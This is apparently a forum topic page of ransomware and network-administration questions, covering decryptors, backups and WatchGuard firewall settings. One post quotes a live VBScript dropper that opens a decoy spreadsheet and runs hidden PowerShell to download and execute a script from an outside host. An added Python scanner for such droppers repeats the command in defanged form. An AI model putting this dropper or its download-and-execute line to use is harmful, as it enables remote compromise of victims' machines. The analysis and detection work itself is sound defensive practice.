Ransomware

176

Solutions

433

Contributors

Ransomware is malicious software, designed to block data access in order to extort money. As a form of malware, ransomware is most often used to infiltrate devices through infected emails or links that, in turn, recognize and take advantage of vulnerabilities in the operating system and installed third-party software.


I have shadow copies enabled on the C:\ drive of a Windows 2012 server. I currently have it set to the configuration below:

Maximum Size: 35MB
Schedule: Twice a day at 06:00 and 13:00

The server also has Acronis Backup installed and running multiple backup jobs to a local NAS and also to Acronis Cloud.

I've noticed that the shadow copy maximum size setting constantly resets to "no limit" but I can't understand why.

Can someone please offer any advice on why this occurs and how best to stop it being reset?
0
I have a customer that was hit with the ACCDFISA v2.0 ransomware. They had the backup drive mounted, so it seems like it deleted the files that were not encrypted. Is there any solution to this? They are asking for $4000 in Bitcoin.

Thanks.
0
Hi,

We use Mitel 5212 IP Phones. We are trying to get them to work on a custom VLAN setup on a WatchGuard M500 firewall. We have created the custom VLAN and the IP scope, which works fine. I have mimicked the DHCP options from our Windows-based DHCP server, however this didn't work. On the Windows-based DHCP server the options are:

128 Mitel TFTP xxxx.xxxx.xxxx.xxxx
129 Mitel RTC xxxx.xxxx.xxxx.xxxx
130 Mitel IP Phone Identifier MITEL IP PHONE
132 VLAN for Mitel IP Phone 0x3
133 priority for Mitel IP Phone 0x6

On the firewall DHCP scope options (all custom):

Code  Name                         Type  Value
128   Mitel TFTP                   IP    xxxxxx
129   Mitel RTC                    IP    xxxxxx
130   Mitel IP Phone Identifier    Text  MITEL IP PHONE
132   VLAN for Mitel IP Phone      Hex   3
133   Priority for Mitel IP phone  Hex   6

When the phone eventually boots it gets a crazy VLAN ID. Any clues as to what I am missing, or a how-to guide on getting the IP phones to work?

Cheers,
Paul
0
Has anyone had any luck with removing/recovering from nozelesn ransomware?
0
Good day

Having issues with Acronis Backup 12.5. I have used it on numerous servers, but one server is giving errors when remotely trying to install the agent.

Acronis Server details
Windows 2012 R2 up to date with patching

Target server
Windows 2012 R2 up to date with patching

I have even disabled AV and the firewall on the target server. The installation from the Acronis server runs up to 38% and then fails with the error below:

Windows error: (0x80070643) Fatal error during installation

Date and time: Oct 02, 2018, 11:09:50 AM
Code: 4
Module: 309
Message: TOL: Failed to execute the command. Remote installation

Additional info:

------------------------
Error code: 22
Module: 309
LineInfo: 0x8D165E86FB81959B
Fields: {"$module":"management_server_vsa64_10330","CommandID":"8F2647A6-33E4-400D-BE39-561E2C91CC2F"}
Message: TOL: Failed to execute the command. Remote installation
------------------------
Error code: 22
Module: 309
LineInfo: 0x8D165E86FB81959B
Fields: {"$module":"remote_installation_addon_vsa64_10330","CommandID":"8F2647A6-33E4-400D-BE39-561E2C91CC2F"}
Message: TOL: Failed to execute the command. Remote installation
------------------------
Error code: 140
Module: 69
LineInfo: 0x448BB490B35D3532
Fields: {"$module":"remote_installation_addon_vsa64_10330"}
Message: Request to the remote installation service has failed. This may indicate a connection failure.

Error code: 101
Module: …
0
Hi, I have a problem with downloading Decrypting Cryakl from https://www.experts-exchange.com/articles/31579/Decrypting-Cryakl-1-4-0-0-1-4-1-0-FAIRYTAIL-Ransomware.html (and decryptors.blogspot.com). Can you help me with downloading the application?
I want to test it on CL 1.5.1.0. I have one PC with this encryptor. I know that it was installed through RDP, and I have some files and logs. Maybe your decryptor can help.
It will then be possible to pass the information on to others.

Thank you.
0
There's a request for a "Change runbook" that documents/records changes from Day 1 so that, in the event of bad changes (malicious or inadvertent ones) being introduced along the line of changes, we can rebuild a server/system back selectively, dropping the "bad" change so that we can bring the system up to a "clean" slate.

I was told it's not "Change Control" nor CRs that we are looking at here.

I've suggested that a 'bare metal' backup be done with incremental backups (I think EMC has one such product), but this is not what the team requires.

Any documents, tools or methods are much appreciated.
0
Dear Team,
My Domain Controller's SYSVOL folder is affected by ransomware. The DC is working fine now.
How do I recreate the SYSVOL files? I have only one DC and no backup.

The server OS is Windows 2012.
I cannot reinstall the DC since I have my Exchange running on it.
0
It hasn't happened, but I'm just wondering:

If my Google Drive got hit and all files were encrypted, can I revert back to last week's clean files?

So I'm asking: does Google Drive afford any sort of fallback plan for this scenario?

Thanks
2
I have a user who is using the Watchguard VPN client software. They have been using it on Windows 10 Pro (v 1709) for 6 months without issue. The UAC prompt suddenly started appearing this morning when they try to run the software. No updates for Windows or the software have been installed. I have 60 other users that are using it without this problem also. I am at a loss as to why this would suddenly start needing elevated privileges to run. Does anyone know why this would happen or how to fix it? I am not going to disable user account control or give them admin rights.
0
Hello all,

I am the owner of a small business in my town. I got infected by a ransomware with the .rapid extension; it wants a big ransom that I can't pay.
Is there any solution for this version? Please help.
0
I have Acronis for backups to tape. I want to be able to back up the "System State" of my DC. What files or folders do I need to make sure get backed up?
0
I had this question after viewing Watchguard Firewall xFlow Configuration.
0
A customer has a WatchGuard T10 Firebox firewall for a POS system. The POS server connects directly to the trusted network port; no other computers connect to that network.

The customer wants to set up an access point for Wi-Fi. The WatchGuard has a 3rd port. I want to activate it as a second network and allow wireless devices to access the internet.

The WatchGuard firewall does not have built-in Wi-Fi. We purchased an access point that we plan to connect to the 3rd port.

This is a restaurant; there are no office PCs or network printers.

I need suggestions on policies. The device has content filter subscriptions, and I want to enforce them on the 3rd port too if possible.
0
We believe a client has been hacked but can't determine what the VBScript is doing to the data; it doesn't look like ransomware.
Can you help point us in a direction as to what degree this hack could be?

Below is the VBScript and a picture of a folder it has been found in. You will see that the actual Excel doc has been hidden and a fake Excel doc put in its place. It looks like when the fake Excel doc is run, it opens up the VBScript and the hidden Excel doc.

VBScript
Set fso = CreateObject("Scripting.FileSystemObject")
Set shl = CreateObject("WScript.Shell")
Set shp = CreateObject("WScript.Shell")
' Marker folder under %APPDATA%, named after the machine's WMI UUID (see GetUUID below);
' its presence is used to tell a first run from later runs
path=shl.ExpandEnvironmentStrings("%APPDATA%")+"\"+GetUUID(".")
exists = fso.FolderExists(path)
' Path of the real (hidden) workbook that sits next to this script
Set objFile = fso.GetFile(Wscript.ScriptFullName)
rr = fso.GetParentFolderName(objFile)+"\Project 8192 LNG STS System Certification Log.xlsx"
if (exists) then
' Marker already present: only open the real workbook so the user sees nothing unusual
shl.Run("explorer.exe "+rr+"")
Else
' First run: open the real workbook as a decoy, then silently launch PowerShell
' (hidden window, execution policy bypassed) to download a remote script and run it in memory
shl.Run("explorer.exe "+rr+"")
shp.Run "powershell.exe  -windowstyle hidden -executionpolicy bypass -command iex((nEw-ObJect ('NEt.WeBclient')).('DowNLoAdStrInG').invoKe(('https://cflfuppn.eu/sload/2.0/netF.ps1')))",0,True
Set shp = Nothing
end if
' Reads the machine UUID from WMI; used above to build the per-machine marker folder name
Function GetUUID(strComputer)
Dim objWmi, colItems, objItem, strUUID, blnValidUUID
Set objWmi = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colItems = objWmi.ExecQuery("Select * from Win32_ComputerSystemProduct")
strUUID = ""
blnValidUUID = False
For Each objItem in colItems
strUUID = objItem.UUID
If Not …
0
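To help triage a script like the one quoted in the post above, here is an added example (not part of the original post and not code from any product named on this page): a Python scanner that reads a VBScript's text without executing it, flags the behaviour markers visible in that script (a hidden PowerShell launch with the execution policy bypassed, DownloadString fed into iex, a WMI machine-UUID lookup, a decoy document opened through explorer.exe) and defangs any URL it finds for an incident report. The sample script, the indicator names and the example.invalid URL are constructed for this example.

```python
"""Indicator scan for VBScript droppers of the kind quoted above.

Added example (not part of the original post). It never runs the script; it
scans the text for behaviour markers a defender cares about. The sample
script at the bottom is constructed and defanged: its URL uses the reserved
.invalid TLD and nothing is downloaded.
"""
import re
from typing import Dict, List, Tuple

# Patterns are case-insensitive so mixed-case obfuscation such as
# "nEw-ObJect" or "DowNLoAdStrInG" does not slip past them.
INDICATORS: List[Tuple[str, re.Pattern]] = [
    ("wscript_shell", re.compile(r'createobject\(\s*"wscript\.shell"\s*\)', re.I)),
    ("hidden_powershell",
     re.compile(r"powershell(?:\.exe)?\b[^\r\n]*-windowstyle\s+hidden", re.I)),
    ("execution_policy_bypass", re.compile(r"-executionpolicy\s+bypass", re.I)),
    ("net_webclient", re.compile(r"net\.webclient", re.I)),
    ("download_and_execute",
     re.compile(r"\biex\b[^\r\n]*downloadstring|downloadstring[^\r\n]*\biex\b", re.I)),
    ("wmi_machine_uuid", re.compile(r"win32_computersystemproduct", re.I)),
    ("decoy_launch_via_explorer", re.compile(r'\.run\s*\(\s*"explorer\.exe\s', re.I)),
]

# Indicators that together point at a downloader rather than an admin script.
STRONG = {"hidden_powershell", "execution_policy_bypass",
          "download_and_execute", "net_webclient"}

URL_RE = re.compile(r"""https?://[^\s'"()]+""", re.I)


def scan_vbscript(text: str) -> Dict[str, List[str]]:
    """Map each triggered indicator name to the script lines that triggered it."""
    hits: Dict[str, List[str]] = {}
    for name, pattern in INDICATORS:
        matching = [line.strip() for line in text.splitlines() if pattern.search(line)]
        if matching:
            hits[name] = matching
    return hits


def extract_urls(text: str, defang: bool = True) -> List[str]:
    """Pull URLs out of the script; defanged so they are safe to paste into a report."""
    urls = URL_RE.findall(text)
    if defang:
        urls = [u.replace("http", "hxxp", 1).replace(".", "[.]") for u in urls]
    return urls


def classify(hits: Dict[str, List[str]]) -> str:
    """Two or more strong indicators together form the download-and-execute signature."""
    strong_hits = len(STRONG & set(hits))
    if strong_hits >= 2:
        return "likely downloader"
    if hits:
        return "suspicious"
    return "no indicators"


# Constructed sample mirroring the structure of the quoted script (defanged URL).
SAMPLE_VBS = r'''Set fso = CreateObject("Scripting.FileSystemObject")
Set shl = CreateObject("WScript.Shell")
path = shl.ExpandEnvironmentStrings("%APPDATA%") + "\" + GetUUID(".")
rr = fso.GetParentFolderName(objFile) + "\Quarterly Report.xlsx"
shl.Run("explorer.exe " + rr + "")
shl.Run "powershell.exe -windowstyle hidden -executionpolicy bypass -command iex((nEw-ObJect ('NEt.WeBclient')).('DowNLoAdStrInG').invoKe(('https://example.invalid/stage2.ps1')))", 0, True
Set objWmi = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
Set colItems = objWmi.ExecQuery("Select * from Win32_ComputerSystemProduct")
'''

if __name__ == "__main__":
    found = scan_vbscript(SAMPLE_VBS)
    print("verdict:", classify(found))
    for name, lines in found.items():
        print(f"  [{name}]")
        for line in lines:
            print("     ", line[:100])
    print("urls:", extract_urls(SAMPLE_VBS))
```

Running the block on the constructed sample reports "likely downloader" with all seven indicators and the defanged URL. The value of splitting the markers out is that a single one (a WScript.Shell object, say) is common in legitimate logon scripts, whereas a hidden PowerShell window plus an execution-policy bypass plus DownloadString into iex rarely has a benign explanation; the `classify` threshold encodes that distinction.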
How do I block RFC 1918 addresses, create object-groups, and use those object-groups to block any UDP traffic inbound to the external interface on a WatchGuard Firebox (M200)?
0
We have a WatchGuard M200 firewall on which we would like to limit inbound/outbound bandwidth to 20Mbps on our External (WAN) interface. Our ISP allows for 40Mbps total bandwidth. I've gone into Traffic Management and changed the interface to limit bandwidth to 20Mbps, but this only seems to apply to upstream outbound traffic. Inbound traffic is still coming in at the full 40Mbps. Is it possible to also limit inbound traffic to 20Mbps?

Thank you
0
Hi!
I'm trying to use the program by James-Gourley to decrypt a 1.4.0.0 version of Cryakl. Some files are decrypted correctly, and other files are not decrypted, with an "encryption signature mismatch" message. Help me please. Sample files: https://dropmefiles.com/769Q7 More examples of unencrypted files: https://dropmefiles.com/CZ7xH
0
Need help with decrypting files after Cryakl 1.5.1.
Encrypted and original file attached.
0
I have an urgent issue and can't seem to find an answer.

The client has Server 2012. A software VPN is set up, which is no longer working.
The server had GDATA installed, which I removed, and I reinstalled Webroot. Then I restarted the server.

Since this I have not been able to get the VPN working again. I have tried running removal tools for Webroot and GData and disabled the Windows firewall; however, no success at all. Still no VPN access.

Does anyone have any suggestions?

Error is

The network connection between your computer and the VPN server could not be established because the remote server is not responding. This could be because one of the network devices (e.g, firewalls, NAT, routers, etc) between your computer and the remote server is not configured to allow VPN connections. Please contact your Administrator or your service provider to determine which device may be causing the problem.
0
I am having an issue accessing a secure FTP web site from a network. The network uses a WatchGuard XTM 25 appliance and runs Server 2008 R2 as the network server. The workstations are all Windows 7 Pro.

The URL is https://oebsftp.ontarioenergyboard.ca. This should bring me to a login page, but instead the following message appears.

The message from IE 11 is as follows:

This page can’t be displayed


Turn on TLS 1.0, TLS 1.1, and TLS 1.2 in Advanced settings and try connecting to https://oebsftp.ontarioenergyboard.ca  again. If this error persists, it is possible that this site uses an unsupported protocol or cipher suite such as RC4 (link for the details), which is not considered secure. Please contact your site administrator.

Firefox gives the following:
Secure Connection Failed

The connection to oebsftp.ontarioenergyboard.ca was interrupted while the page was loading.

    The page you are trying to view cannot be shown because the authenticity of the received data could not be verified.
    Please contact the website owners to inform them of this problem.

Often the Ontario Energy Board upload sites are designed for IE only.

I do not see anything in the WatchGuard appliance, but I may be overlooking something.

The server uses SEP 14.0 for both anti-virus and firewall.

As a separate issue, email using Outlook 2013 cannot use SSL either.
0
Hi James ..... I'm back here .... sadly.
I've another computer infected with Fairytail .... I think it's the same version that I cleaned earlier.
I've just downloaded your decryptor, but I think something went wrong with it.
The earlier version worked fine for me .... but this one seems to give me some trouble. I used it on 3 different PCs and I received the same error. All of them were running Windows 10 64-bit.
I have a clean file and the same file encrypted to use in the decryptor.
But as soon as I select the encrypted file, I receive the error I attach.
0
We have a WatchGuard M300. We currently have an internet connection that is too small for our needs. Our issue is the upload speed is capped at 20Mbps. With the M300 can we add a second internet connection and have our internet traffic divided evenly between these two connections?
0
Hi All

This is not a question as such; I'm looking for information and ideas on how I can pass VLANs across an IPsec VPN tunnel.

I've got 16 VLANs hosted at one site located a few hundred kilometers away from my secondary site, and I want to be able to push the VLANs from the main site to the secondary site and then be able to distribute those via a switch at the remote site.

The sites will be connected via either SonicWall or WatchGuard UTM appliances.

Any help or suggestions on this would be greatly appreciated.
0
Dear All,

A friend of mine's company server got hijacked by embassy@scryptmail.com using Disk-crypt. After much negotiation we got the codes (price reduced from £4000 to £300), so the laptops have all been decrypted. The server, a Dell using a RAID 1 mirror on a PERC S300 controller, hasn't been straightforward; I eventually worked out that I had to boot from an alternate SSD with the driver and an SMB server 2011, etc. I've now decrypted the drives, even though the server boot BSODs (to sort later), but does anyone know how to remove the boot-time password demand from the MBR, please?

Regards
D
0